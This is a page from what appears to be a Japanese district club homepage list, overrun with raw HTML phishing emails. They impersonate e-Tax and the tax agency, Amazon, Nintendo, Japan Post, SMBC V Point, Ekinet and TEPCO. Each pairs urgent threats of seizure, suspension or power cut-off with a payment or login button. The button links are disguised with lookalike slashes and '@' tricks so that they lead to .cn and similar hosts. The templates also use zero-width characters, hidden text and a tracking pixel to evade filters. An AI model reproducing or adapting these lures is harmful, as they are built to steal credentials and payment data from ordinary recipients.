331-B地区クラブホームーページ一覧
331-B サイト
http://huat.jp/331b-website

【税務署通知】税金未納に関するお知らせ

<!-- NOTE: e-Tax Ultra v2 | New DOM Hash | Unused Layout --><HTML lang=ja><HEAD>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=format-detection content=telephone=no>
<META name=color-scheme content="light only">
<STYLE>
body {
margin: 0;
padding: 0;
background: #f2f5f9;
font-family: "Hiragino Kaku Gothic ProN", Meiryo, sans-serif;
color: #222;
font-size: 15px;
line-height: 1.8;
}
.frame {
max-width: 700px;
margin: 0 auto;
background: #fff;
border: 1px solid #dcdcdc;
border-radius: 10px;
overflow: hidden;
}
.bar-top {
background: #003366;
color: #fff;
padding: 22px 20px;
font-size: 17px;
font-weight: bold;
text-align: center;
}
.section {
padding: 26px 30px;
}
.section p {
margin: 12px 0;
}
.notice {
background: #fff5f5;
border-left: 5px solid #b71c1c;
padding: 18px;
margin: 20px 0;
border-radius: 4px;
}
.info-list {
background: #f0f4f8;
padding: 20px;
border: 1px solid #ccd3db;
border-radius: 5px;
}
.info-list ul {
margin: 0;
padding-left: 20px;
}
.info-list li {
margin-bottom: 8px;
}
.jump {
display: flex;
justify-content: center;
margin: 30px 0;
}
.jump a {
display: inline-block;
padding: 12px 34px;
border: 2px solid #003366;
color: #003366;
text-decoration: none;
font-weight: bold;
border-radius: 32px;
transition: 0.3s;
}
.jump a:hover {
background: #003366;
color: #fff;
}
.support {
font-size: 13px;
color: #444;
padding-top: 10px;
}
.footer {
font-size: 12px;
color: #666;
background: #f9f9f9;
padding: 22px;
border-top: 1px solid #ccc;
}
@media screen and (max-width: 600px) {
.section {
padding: 20px;
}
.jump a {
width: 90%;
box-sizing: border-box;
font-size: 16px;
}
}
</STYLE>

</HEAD>
<BODY>
<DIV class=frame>
<DIV class=bar-top>【e-Tax】税金未納に関する重要なお知らせ</DIV>
<DIV class=section>
<P>e-Taxをご利用いただき、誠にありがとうございます。</P>
<P>下記の日付に関して、所得税または延滞金(法律に基づき算出されたもの)のお支払いが確認できておりません。</P>
<P>これまで自主的な納付をお願いしてまいりましたが、現時点で未納の状態が継続しております。</P>
<DIV
class=notice>このまま最終期限までに納付がない場合、<BR>不動産・自動車等の登録財産や給与・売掛金等の債権に対する差押処分が実施される可能性がございます。
</DIV>
<DIV class=info-list>
<UL>
<LI><STRONG>納付期限:</STRONG>2025年11月20日
<LI><STRONG>最終期限:</STRONG>2025年12月30日(※延長不可) </LI></UL></DIV>
<DIV class=jump><A
href="https://gydamitkln.com∕JVCvFvv∕cBYngRe∕pkLNH∕xcqnEI∕XrpHHeqX@uAEUSKXRb.jtapio.cn">お支払いへ進む</A>
</DIV>
<DIV class=support>※
本メールは、【e-Tax】国税電子申告・納税システムにご登録いただいた方へ配信しております。<BR>このメールアドレスは送信専用のため、ご返信には対応しておりません。
</DIV></DIV>
<DIV class=footer>ご不明な点がございましたら、以下までお問い合わせください。<BR><BR>カスタマーサポート:<BR>メールアドレス:<A
href="mailto:info@ntago.jp">info@ntago.jp</A><BR>電話番号:03-6680-3000<BR><BR>国税庁<BR>〒100-8978
東京都千代田区霞が関3-1-1<BR>法人番号:7000012050002<BR><BR>Copyright © TAX AGENCY All Rights
Reserved.<BR>このメールは自動生成されたものです。ご返信には対応しておりません。 </DIV></DIV></BODY></HTML>

__【Amazon】プライム機能の再認証が必要となります

<HTML lang=ja><HEAD><TITLE>Amazonプライム支払い確認</TITLE>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=robots content=noindex,nofollow>
<META name=format-detection content=telephone=no>
<STYLE>
body { margin:0; padding:0; background:#f3f4f7; font-family:"Meiryo",sans-serif; color:#2a2a2a; font-size:15px; line-height:1.8; }
.outer-shell { max-width:700px; margin:auto; background:#fff; border-radius:10px; overflow:hidden; box-shadow:0 0 6px rgba(0,0,0,0.05); border:1px solid #ddd; }
.headbar { background:#232f3e; color:#fff; text-align:center; padding:22px; font-size:16px; font-weight:bold; }
.maincontent { padding:28px 30px; }
.maincontent p { margin-bottom:16px; }
.warnblock { background:#fff0e1; border-left:6px solid #d9822b; padding:14px 20px; font-size:14px; font-weight:bold; border-radius:4px; margin:24px 0; color:#8b4513; }
.cta { text-align:center; margin:30px 0; }
.cta a { display:inline-block; background:#ff8c00; color:#fff; padding:14px 36px; font-size:15px; font-weight:bold; text-decoration:none; border-radius:5px; transition:all .3s ease; }
.cta a:hover { background:#d26900; }
.infolist { padding:0 0 0 20px; margin:0 0 24px; font-size:14px; color:#333; }
.infolist li { margin-bottom:8px; }
.footerinfo { background:#f5f6f7; padding:20px 26px; font-size:13px; color:#666; border-top:1px solid #ccc; text-align:center; }
.footerinfo a { color:#007bff; text-decoration:none; }
@media screen and (max-width: 600px) {
.maincontent { padding:18px 16px; }
.cta a { width:100%; padding:16px 0; box-sizing:border-box; }
}
</STYLE>

</HEAD>
<BODY>
<DIV class=outer-shell>
<DIV class=headbar>Amazonプライム会員資格の更新について</DIV>
<DIV class=maincontent>
<P>いつもAmazonプライムをご利用いただき、誠にありがとうございます。</P>
<P>現在、ご登録の支払い方法により月額料金の請求が正常に処理できておりません。</P>
<P style="clear:none;"><STRONG>お支払い情報を確認の上、3日以内に再設定をお願いいたします。</STRONG></P>
<DIV class=warnblock>ご対応がない場合、プライム特典の一時停止やアカウント機能の制限が行われる可能性があります。 </DIV>
<P><STRONG>請求保留の主な理由:</STRONG></P>
<UL class=infolist>
<LI>クレジットカードの有効期限切れ
<LI>口座残高不足または引き落とし不能
<LI>カード会社による承認拒否
<LI>登録情報の更新漏れ </LI></UL>
<P style="align-content:stretch;">プライム特典を継続してご利用いただくために、早めのご対応をお願いいたします。</P></DIV>
<DIV class=cta><A
href="https://pmbmup.com∕kkrjeihzy∕aucejhi∕xsjuxqmj∕tgfli∕nvemsn@adwjthq.cn">お支払い方法を確認する</A>
</DIV>
<DIV class=footerinfo>このメールは送信専用です。返信はできません。<BR>詳細は <A href="#">カスタマーサービス</A>
までお問い合わせください。<BR><BR>© 2025 Amazon Japan G.K. All rights reserved.
</DIV></DIV></BODY></HTML>

【重要】自動継続購入の停止とお手続き方法のご案内(Nintendo Switch Online)

※本メールは、Nintendo Switch Onlineの自動継続購入が完了できなかった方に送付をしています。

以下のいずれかの理由のため、「 2026/1/23 (JST)」からのご利用分の決済を行うことができませんでした。

===
【お支払い方法を設定済みの場合】
・お支払い方法(クレジットカードまたはPayPal)が決済に利用できない。

[例]
-登録されているクレジットカードの有効期限が切れている。
-何らかの理由でそのクレジットカードが利用できない。


【お支払い方法を未設定の場合】
・ニンテンドーeショップの残高が不足している
===

引き続きNintendo Switch Onlineのサービスをご利用いただく場合は、ニンテンドーeショップまたは、以下のリンクより、再度利用券をご購入ください。

▼利用券を再度購入する
https://ec.nintendo.com/JP/ja/fojwsuqdew/membership

-------------------------
このメールアドレスには返信できません。
ご不明な点等がございましたら、下記までお問い合わせください。

▽Nintendo Switch Online
https://www.nintendo.co.jp/hardware/switch/onlineservice/index.html

▽任天堂サポートサイト
https://support.nintendo.com/jp

--------------------
任天堂株式会社
京都府京都市南区上鳥羽鉾立町11-1

__【Amazon】プライム会員資格が現在一時的に停止されています

<HTML lang=ja><HEAD><TITLE>Amazonプライム支払い確認</TITLE>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=robots content=noindex,nofollow>
<META name=format-detection content=telephone=no>
<STYLE>
body { margin:0; padding:0; background:#f3f4f7; font-family:"Meiryo",sans-serif; color:#2a2a2a; font-size:15px; line-height:1.8; }
.outer-shell { max-width:700px; margin:auto; background:#fff; border-radius:10px; overflow:hidden; box-shadow:0 0 6px rgba(0,0,0,0.05); border:1px solid #ddd; }
.headbar { background:#232f3e; color:#fff; text-align:center; padding:22px; font-size:16px; font-weight:bold; }
.maincontent { padding:28px 30px; }
.maincontent p { margin-bottom:16px; }
.warnblock { background:#fff0e1; border-left:6px solid #d9822b; padding:14px 20px; font-size:14px; font-weight:bold; border-radius:4px; margin:24px 0; color:#8b4513; }
.cta { text-align:center; margin:30px 0; }
..cta a { display:inline-block; background:#ff8c00; color:#fff; padding:14px 36px; font-size:15px; font-weight:bold; text-decoration:none; border-radius:5px; transition:all .3s ease; }
.cta a:hover { background:#d26900; }
.infolist { padding:0 0 0 20px; margin:0 0 24px; font-size:14px; color:#333; }
.infolist li { margin-bottom:8px; }
.footerinfo { background:#f5f6f7; padding:20px 26px; font-size:13px; color:#666; border-top:1px solid #ccc; text-align:center; }
.footerinfo a { color:#007bff; text-decoration:none; }
@media screen and (max-width: 600px) {
.maincontent { padding:18px 16px; }
.cta a { width:100%; padding:16px 0; box-sizing:border-box; }
}
</STYLE>

</HEAD>
<BODY>
<DIV class=outer-shell>
<DIV class=headbar>Amazonプライム会員資格の更新について</DIV>
<DIV class=maincontent>
<P>いつもAmazonプライムをご利用いただき、誠にありがとうございます。</P>
<P>現在、ご登録の支払い方法により月額料金の請求が正常に処理できておりません。</P>
<P><STRONG>お支払い情報を確認の上、3日以内に再設定をお願いいたします。</STRONG></P>
<DIV class=warnblock>ご対応がない場合、プライム特典の一時停止やアカウント機能の制限が行われる可能性があります。 </DIV>
<P style="isolation:auto;"><STRONG>請求保留の主な理由:</STRONG></P>
<UL class=infolist>
<LI>クレジットカードの有効期限切れ
<LI>口座残高不足または引き落とし不能
<LI>カード会社による承認拒否
<LI>登録情報の更新漏れ </LI></UL>
<P>プライム特典を継続してご利用いただくために、早めのご対応をお願いいたします。</P></DIV>
<DIV class=cta><A
href="https://acdjhzplup.com∕zclvpaevpv∕gstehdvhuo∕runxjsxhkv∕svxviv∕nrndewk@adwjthq.cn">お支払い方法を確認する</A>
</DIV>
<DIV class=footerinfo>このメールは送信専用です。返信はできません。<BR>詳細は <A href="#">カスタマーサービス</A>
までお問い合わせください。<BR><BR>© 2025 Amazon Japan G.K. All rights reserved.
</DIV></DIV></BODY></HTML>

【Amazon】アカウント特典の状態が確認不能となりました【331b-hp】

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="ja">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
</head>
<body style="margin:0;padding:0;-webkit-text-size-adjust:100%%;-ms-text-size-adjust:100%%;">
<div class="email-body"><!DOCTYPE html>
<html lang="ja">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>【重要】Amazon.co.jp アカウントのセキュリティに関するお知らせ</title>
<style>
body { font-family: 'Hiragino Kaku Gothic ProN', 'MS PGothic', sans-serif; line-height: 1.6; color: #333; margin: 0; padding: 20px; background-color: #f4f4f4; }
.container { max-width: 600px; margin: 0 auto; background: #fff; padding: 30px; border-radius: 4px; border: 1px solid #ddd; }
.header { font-size: 18px; font-weight: bold; border-bottom: 2px solid #ff9900; padding-bottom: 10px; margin-bottom: 20px; }
.content { margin-bottom: 20px; }
.cta-button { display: inline-block; background-color: #ff9900; color: #000; text-decoration: none; padding: 12px 25px; border-radius: 3px; font-weight: bold; margin: 20px 0; }
.footer { font-size: 12px; color: #777; border-top: 1px solid #eee; padding-top: 10px; }
.obfuscate { display: none; font-size: 0; color: transparent; }
</style>
</head>
<body>
<div class="container">
<div class="header">
【重要】Amazon.co.jp<span class="obfuscate">q&#8203;w&#8204;e</span> アカ&#8204;ウントの制&#8203;限について
</div>
<div class="content">
<p>お客様のアカ&#8204;ウントにおいて、通常とは異なるログ&#8203;イン試行が検&#8204;出されました。</p>
<p>セキュ&#8204;リティ保護のため、現在一部の機&#8203;能(ご注&#8204;文の発送を含む)を一時的に制&#8203;限させていただいております。</p>
<p><strong>2026-01-22</strong> までに以下のリンクよりアカ&#8204;ウントの確&#8203;認を完了させてください。確&#8204;認が取れない場合、アカ&#8203;ウントが完全に停止される可能性がございます。</p>
<a href="https://amazoon.accountservicenotification.cfd/v11/app/page/html/checklogin?cid=95543515525121" class="cta-button">アカウントを今すぐ確認する</a>
<p>お客様の安全を守るための措置ですので、ご理解とご協力をお願いいたします。</p>
</div>
<div class="footer">
<p>Amazon.co.jp セキュリティチーム<br>
※本メールはシステムより自動送信されています。</p>
</div>
</div>
<br><br></body>
</html></div>
</body>
</html>

__【確認が必要です】日本郵政アカウント情報の更新について

<!-- UltraClean JapanPost v1 | DOM再構築 + CTA再設計 + Responsive --><HTML
lang=ja><HEAD>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=robots content=noindex,nofollow>
<META name=format-detection content=telephone=no>
<STYLE>
body {
margin: 0;
padding: 0;
background: #f0f3f7;
font-family: "Meiryo", sans-serif;
color: #333;
font-size: 15px;
line-height: 1.8;
}
.container {
max-width: 680px;
margin: 30px auto;
background: #fff;
border-radius: 12px;
overflow: hidden;
box-shadow: 0 1px 6px rgba(0,0,0,0.05);
}
.header {
background: #b80000;
color: #fff;
padding: 24px;
font-size: 18px;
font-weight: bold;
text-align: center;
}
.body {
padding: 28px 30px;
}
.body p {
margin: 14px 0;
}
.highlight {
background: #fff5f5;
border-left: 4px solid #b80000;
padding: 16px;
margin: 20px 0;
font-size: 14px;
border-radius: 4px;
}
.cta-area {
text-align: center;
margin: 32px 0;
}
.cta-link {
background: #b80000;
color: #fff;
padding: 14px 34px;
border-radius: 40px;
font-weight: bold;
text-decoration: none;
font-size: 15px;
display: inline-block;
transition: background 0.3s ease;
}
.cta-link:hover {
background: #8c0000;
}
.footer {
background: #f7f7f7;
font-size: 12px;
color: #777;
padding: 20px;
text-align: center;
border-top: 1px solid #ccc;
line-height: 1.6;
}
.footer a {
color: #b80000;
text-decoration: none;
}
@media screen and (max-width: 600px) {
.body {
padding: 20px;
}
.cta-link {
width: 92%;
box-sizing: border-box;
padding: 14px 0;
}
}
</STYLE>

</HEAD>
<BODY>
<DIV class=container>
<DIV class=header>【日本郵便】アカウント再確認のお願い</DIV>
<DIV class=body>
<P style="mix-blend-mode:normal;">ご登録アカウントに関するセキュリティ確認のため、以下の案内に沿ってご対応をお願いいたします。</P>
<DIV class=highlight><STRONG>■
ご確認の背景</STRONG><BR>お客様のアカウントに関して一部不一致が検出されたため、安全のため再確認をお願いしております。 </DIV>
<P style="float:none;"><STRONG>■ ご対応方法</STRONG><BR>下記のボタンよりご本人様確認手続きをお願いいたします。</P>
<DIV class=cta-area><A class=cta-link
href="https://rakutenuqcipjph.com∕djunmf@qudvwz.cn"
target=_blank>ご本人確認へ進む</A> </DIV>
<P style="border-style:none;"><STRONG>■
注意事項</STRONG><BR>・このメールは送信専用です。返信には対応しておりません。<BR>・不審なサイトや連絡には十分ご注意ください。<BR>・本件に関する詳細は日本郵便の公式ウェブサイトをご確認ください。</P>
<P><STRONG>■ 発信元</STRONG><BR>日本郵便株式会社<BR>〒100-8792 東京都千代田区霞が関</P></DIV>
<DIV class=footer>お問い合わせは <A href="https://www.post.japanpost.jp/">日本郵便公式サイト</A>
よりお願いいたします。<BR><BR>© 2025 Japan Post Co., Ltd. All rights reserved.
</DIV></DIV></BODY></HTML>

【重要】Vポイント有効期限が迫っています|お早めにご利用くださいNo.3223705515

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML lang=ja svg="http://www.w3.org/2000/svg" 2000 www.w3.org http:
XMLNS:[default] XMLNS:[default] http://www.w3.org/2000/svg =
"http://www.w3.org/2000/svg"><HEAD>
<META content="text/html; charset=utf-8" http-equiv=Content-Type>
<META name=GENERATOR content="MSHTML 11.00.10570.1001"></HEAD>
<BODY>
<P data-end="144" data-start="108"><STRONG data-end="144"
data-start="108">【重要】Vポイント有効期限が迫っています|お早めにご利用ください</STRONG></P>
<P data-end="177" data-start="146">いつも三井住友カードをご利用いただきありがとうございます。</P>
<P data-end="253" data-start="179">お客様がお持ちの <STRONG data-end="216"
data-start="188">Vポイントの一部が、まもなく有効期限を迎えます。</STRONG><BR data-end="219"
data-start="216">有効期限を過ぎると、未使用分のポイントは自動的に失効いたします。</P>
<P data-end="303" data-start="255">────────────────────<BR data-end="278"
data-start="275">■ 失効予定ポイント数<BR data-end="292" data-start="289"><FONT
color=red>8,860ポイント</FONT></P>
<P data-end="328" data-start="305">■ 失効予定日<BR data-end="315"
data-start="312"><FONT color=red>2026年01月24日</FONT></P>
<P data-end="380" data-start="330">────────────────────<BR data-end="353"
data-start="350">Vポイントは、以下の特典にすぐご利用いただけます。</P>
<P data-end="514" data-start="382">・現金キャッシュバック(口座振込・請求金額からの減額)<BR data-end="412"
data-start="409">・Amazonギフト券・Google Play・App Store &amp; iTunes ギフトコード<BR
data-end="464" data-start="461">・ANAマイル・Tポイント・楽天ポイント など各種提携先ポイント<BR
data-end="499" data-start="496">・各種電子マネーや商品交換</P>
<P data-end="574" data-start="516">

__【急務】えきねっとアカウント異常の自動退会即時解除対応について

<!-- UltraClean GenericSecure v1 | DOM再構成 + CTA再設計 + Responsive --><HTML
lang=ja><HEAD>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=robots content=noindex,nofollow>
<META name=format-detection content=telephone=no>
<STYLE>
body {
margin: 0;
padding: 0;
font-family: "Yu Gothic", "Meiryo", sans-serif;
background: #eef0f4;
color: #222;
font-size: 15px;
line-height: 1.7;
}
.wrapper {
max-width: 700px;
margin: 24px auto;
background: #fff;
border-radius: 10px;
box-shadow: 0 1px 8px rgba(0,0,0,0.05);
overflow: hidden;
}
.topbar {
background: #003356;
color: #fff;
font-size: 17px;
font-weight: bold;
text-align: center;
padding: 20px;
}
.content {
padding: 28px 30px;
}
.content p {
margin: 14px 0;
}
.bullet-box {
background: #f4f6fa;
border-left: 4px solid #004466;
padding: 16px 20px;
margin: 20px 0;
font-size: 14px;
}
.bullet-box li {
margin-bottom: 10px;
}
.cta-area {
text-align: center;
margin: 30px 0;
}
.cta-button {
background: #004080;
color: #fff;
font-weight: bold;
font-size: 15px;
text-decoration: none;
border-radius: 999px;
padding: 14px 36px;
display: inline-block;
transition: background 0.3s ease;
}
.cta-button:hover {
background: #002f5c;
}
.footer {
background: #f3f3f3;
font-size: 13px;
color: #666;
text-align: center;
padding: 20px;
border-top: 1px solid #ccc;
line-height: 1.6;
}
@media screen and (max-width: 640px) {
.content {
padding: 20px 16px;
}
.cta-button {
width: 92%;
box-sizing: border-box;
padding: 14px 0;
}
}
</STYLE>

</HEAD>
<BODY>
<DIV class=wrapper>
<DIV class=topbar>【重要なお知らせ】アカウント保全のご協力のお願い</DIV>
<DIV class=content>
<P>平素より弊社サービスをご利用いただき、誠にありがとうございます。</P>
<P style="animation-name:none;">2026-01-23付けで、セキュリティ機能の強化に伴う本人確認の手続きが必要となっております。</P>
<UL class=bullet-box>
<LI>セキュリティ更新によるシステム変更
<LI>不正アクセス防止のための再確認
<LI>一定期間未ログインアカウントの確認義務 </LI></UL>
<P>以下のリンクよりログインしてご確認ください。</P>
<DIV class=cta-area><A class=cta-button
href="https://dwdyn.com∕EqehMSqJbj∕nurhCLuOaA∕JdUKn@qnkzoa.cn/zsrefk.co.jp"
target=_blank>ログインして確認する</A> </DIV>
<P style="clip-path:none;">なお、期限までにご確認いただけない場合、アカウントのご利用に制限がかかる可能性がございます。</P></DIV>
<DIV class=footer>※ このメールは送信専用です。ご返信には対応しておりません。<BR>※ 不審なメールやリンクにご注意ください。
</DIV></DIV></BODY></HTML>

__重要なお知らせ【未払いの電気料金について】お支払い方法が承認されませんSW=1306780689

<!-- UltraClean EnergyBilling v1 | 電力料金通知構造再設計 + DOM再構成 --><HTML lang=ja><HEAD>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1..0">
<META name=robots content=noindex,nofollow>
<META name=format-detection content=telephone=no>
<STYLE>
body {
margin: 0;
padding: 0;
background: #f3f5f9;
font-family: "Yu Gothic", "Meiryo", sans-serif;
font-size: 15px;
color: #222;
line-height: 1.8;
}
.envelope {
max-width: 700px;
margin: 30px auto;
background: #fff;
border-radius: 10px;
box-shadow: 0 1px 6px rgba(0,0,0,0.06);
overflow: hidden;
}
.headline {
background: #002c5c;
color: #fff;
padding: 22px;
font-size: 17px;
font-weight: bold;
text-align: center;
}
.content {
padding: 28px 30px;
}
.highlight {
background: #eef4ff;
border-left: 5px solid #003366;
padding: 14px 18px;
border-radius: 5px;
margin: 20px 0;
font-size: 14px;
}
.alert {
background: #fff2f2;
border-left: 5px solid #c00;
padding: 14px 18px;
margin: 20px 0;
border-radius: 5px;
font-size: 14px;
}
.cta {
margin: 32px 0;
text-align: center;
}
.cta a {
background: #002c5c;
color: #fff;
text-decoration: none;
padding: 14px 34px;
border-radius: 40px;
font-weight: bold;
font-size: 15px;
display: inline-block;
transition: 0.3s ease;
}
..cta a:hover {
background: #001b3f;
}
.info {
font-size: 13px;
margin-top: 20px;
color: #555;
}
.footer {
background: #f1f1f1;
font-size: 12px;
color: #666;
text-align: center;
padding: 18px;
border-top: 1px solid #ccc;
}
.footer a {
color: #003366;
text-decoration: underline;
}
@media screen and (max-width: 600px) {
.content { padding: 20px 16px; font-size: 14px; }
.cta a {
width: 100%;
box-sizing: border-box;
padding: 14px 0;
}
}
</STYLE>

</HEAD>
<BODY>
<DIV class=envelope>
<DIV class=headline>【重要】未払い料金に関するご連絡(電気)</DIV>
<DIV class=content>
<P style="page-break-inside:auto;">お客様各位</P>
<P>平素より弊社サービスをご利用いただき、誠にありがとうございます。</P>
<P style="left:auto;">現在、お客様のご契約において <STRONG>電気料金の未払い</STRONG> が確認されております。</P>
<DIV class=highlight>請求書番号:25482956384</DIV>
<DIV class=alert>3日以内にお支払いが確認できない場合、電力供給を一時停止する可能性がございます。</DIV>
<P style="text-align-last:auto;">お手数ですが、以下のリンクよりお支払い内容をご確認ください。</P>
<DIV class=cta><A
href="https://nbkwwmwywk.com∕hMWxJuENvl∕ABmRwu∕SGGVrbjMT@ellkmhe.cn/fZFSCrU5/inbox/6PZHdv/orders/2IZrm16vWal/Cpjwv/inbox/wn_Dk33MWb0vEql/OsU3W/reviews?token=9Rvck5KVL4Mda5mE&cart_id=hf32O_HA_r&session=yE-qGoZtR2"
target=_blank>支払い詳細を確認</A> </DIV>
<DIV
class=info>※このリンクの有効期限は24時間です。お早めにお手続きをお願いいたします。<BR>東京電力エナジーパートナー株式会社<BR>〒100-8560
東京都千代田区内幸町1丁目1番3号 </DIV></DIV>
<DIV class=footer>このメールは送信専用アドレスから配信されています。返信はできません。<BR><A
href="https://ghfaajm.jp/TVMpcSv/details/UNokFH5/settings/yt3esyY/cart/kanIBl8LjQwxrq/4BvwLJYw/help/ZReishsGPRpEEN/a-KZrNs/checkout/qZb5xkqEBws/un_9DH/billing?product=UN_AM3V-&session=aEGGFsDh9_&utm_source=newsletter&id=Njg5v6&clickid=EfkwImv7-qtF&page=lpVC">配信停止はこちら</A> </DIV></DIV><IMG
style="DISPLAY: none" alt="" src="https://www.ogjgskqhf.com/BECvk/inbox/QDVZ9V/details/7k6e-xw/user/T6-WU10/app?device=mobile&id=yT5qmr&product=hQ_K9IHq&clickid=ZT17-AMMOt_U&session=bfrMqFpjvF.png"
width=1 height=1> </BODY></HTML>

__【急務】えきねっとアカウント不具合の迅速な自動退会解除を求める

<!-- UltraClean GenericSecure v1 | DOM再構成 + CTA再設計 + Responsive --><HTML
lang=ja><HEAD>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=robots content=noindex,nofollow>
<META name=format-detection content=telephone=no>
<STYLE>
body {
margin: 0;
padding: 0;
font-family: "Yu Gothic", "Meiryo", sans-serif;
background: #eef0f4;
color: #222;
font-size: 15px;
line-height: 1.7;
}
.wrapper {
max-width: 700px;
margin: 24px auto;
background: #fff;
border-radius: 10px;
box-shadow: 0 1px 8px rgba(0,0,0,0.05);
overflow: hidden;
}
.topbar {
background: #003356;
color: #fff;
font-size: 17px;
font-weight: bold;
text-align: center;
padding: 20px;
}
.content {
padding: 28px 30px;
}
.content p {
margin: 14px 0;
}
.bullet-box {
background: #f4f6fa;
border-left: 4px solid #004466;
padding: 16px 20px;
margin: 20px 0;
font-size: 14px;
}
.bullet-box li {
margin-bottom: 10px;
}
.cta-area {
text-align: center;
margin: 30px 0;
}
.cta-button {
background: #004080;
color: #fff;
font-weight: bold;
font-size: 15px;
text-decoration: none;
border-radius: 999px;
padding: 14px 36px;
display: inline-block;
transition: background 0.3s ease;
}
.cta-button:hover {
background: #002f5c;
}
.footer {
background: #f3f3f3;
font-size: 13px;
color: #666;
text-align: center;
padding: 20px;
border-top: 1px solid #ccc;
line-height: 1.6;
}
@media screen and (max-width: 640px) {
.content {
padding: 20px 16px;
}
.cta-button {
width: 92%;
box-sizing: border-box;
padding: 14px 0;
}
}
</STYLE>

</HEAD>
<BODY>
<DIV class=wrapper>
<DIV class=topbar>【重要なお知らせ】アカウント保全のご協力のお願い</DIV>
<DIV class=content>
<P>平素より弊社サービスをご利用いただき、誠にありがとうございます。</P>
<P>2026-01-23付けで、セキュリティ機能の強化に伴う本人確認の手続きが必要となっております。</P>
<UL class=bullet-box>
<LI>セキュリティ更新によるシステム変更
<LI>不正アクセス防止のための再確認
<LI>一定期間未ログインアカウントの確認義務 </LI></UL>
<P style="mix-blend-mode:normal;">以下のリンクよりログインしてご確認ください。</P>
<DIV class=cta-area><A class=cta-button
href="https://bvkzced.com∕NEhUyklPd∕MPBHyXhq∕iuIfSSx@qnkzoa.cn/svuhki.co.jp"
target=_blank>ログインして確認する</A> </DIV>
<P style="min-height:0;">なお、期限までにご確認いただけない場合、アカウントのご利用に制限がかかる可能性がございます。</P></DIV>
<DIV class=footer>※ このメールは送信専用です。ご返信には対応しておりません。<BR>※ 不審なメールやリンクにご注意ください。
</DIV></DIV></BODY></HTML>

書込


RSS Feed331-B地区HP一覧 RSS Feed

Total Access : 319,515 (Today : 1,346 / Yesterday : 751)

読者メール登録:

http://huat.jp/331b-hp/